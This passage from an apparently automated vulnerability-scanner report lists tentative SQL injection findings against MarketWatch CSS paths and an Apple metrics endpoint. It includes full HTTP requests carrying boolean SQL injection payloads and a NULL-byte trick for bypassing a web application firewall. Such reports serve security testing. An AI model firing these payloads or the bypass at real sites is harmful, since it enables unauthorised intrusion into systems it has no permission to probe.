</TD></TR></TABLE></BODY></HTML>

1.82. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i3.marketwatch.com
Path:   /MW5/content/story/css/story-typography.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /MW5'/content/story/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /MW5''/content/story/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:10 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

1.83. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i3.marketwatch.com
Path:   /MW5/content/story/css/story-typography.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content/story/css/story-typography.css'%20and%201%3d1--%20?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:14 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/content/story/css/story-typography.css'%20and%201%3d2--%20?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.84. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i4.marketwatch.com
Path:   /MW5/content/story/css/story-layout.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16831912'%20or%201%3d1--%20 and 16831912'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW516831912'%20or%201%3d1--%20/content/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:05 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW516831912'%20or%201%3d2--%20/content/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.85. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i4.marketwatch.com
Path:   /MW5/content/story/css/story-layout.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 65568828'%20or%201%3d1--%20 and 65568828'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content65568828'%20or%201%3d1--%20/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:06 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/content65568828'%20or%201%3d2--%20/story/css/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.86. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i4.marketwatch.com
Path:   /MW5/content/story/css/story-layout.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 98828279'%20or%201%3d1--%20 and 98828279'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content/story/css98828279'%20or%201%3d1--%20/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /MW5/content/story/css98828279'%20or%201%3d2--%20/story-layout.css?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:09 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

1.87. http://i4.marketwatch.com/MW5/content/story/css/story-layout.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i4.marketwatch.com
Path:   /MW5/content/story/css/story-layout.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads 18043717'%20or%201%3d1--%20 and 18043717'%20or%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content/story/css/story-layout.css18043717'%20or%201%3d1--%20?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /MW5/content/story/css/story-layout.css18043717'%20or%201%3d2--%20?v3 HTTP/1.1
Host: i4.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:25:09 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

1.88. http://metrics.apple.com/b/ss/applesuperglobal/1/H.20.3/s79162857956252 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.apple.com
Path:   /b/ss/applesuperglobal/1/H.20.3/s79162857956252

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/applesuperglobal%00'/1/H.20.3/s79162857956252?AQB=1&ndh=1&t=14/4/2011%205%3A29%3A21%206%20300&ce=ISO-8859-1&pageName=SEO-Software-US-Dow%20Jones%20%26%20Company%2C%20Inc.-WSJ%20House%20of%20the%20Day-418203198&g=http%3A//itunes.apple.com/us/app/wsj-house-of-the-day/id418203198&r=http%3A//online.wsj.com/article/SB10001424052748703730804576317293981683266.html&ch=SEO&products=Dow%20Jones%20%26%20Company%2C%20Inc.-WSJ%20House%20of%20the%20Day-418203198&h5=appleitmsna%2Cappleitmsus&c12=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/534.24%20%28KHTML%2C%20like%20Gecko%29%20Chrome/11.0.696.68%20Safari/534.24&v12=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/534.24%20%28KHTML%2C%20like%20Gecko%29%20Chrome/11.0.696.68%20Safari/534.24&c22=HTML&v22=HTML&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1020&bh=945&AQE=1 HTTP/1.1
Host: metrics.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/wsj-house-of-the-day/id418203198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=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; geo=US; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 11:31:03 GMT
Server: Omniture DC/2.0.0
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/applesuperglobal was not found on this server.<
...[SNIP]...
<p>Additionally, a 404 Not Found
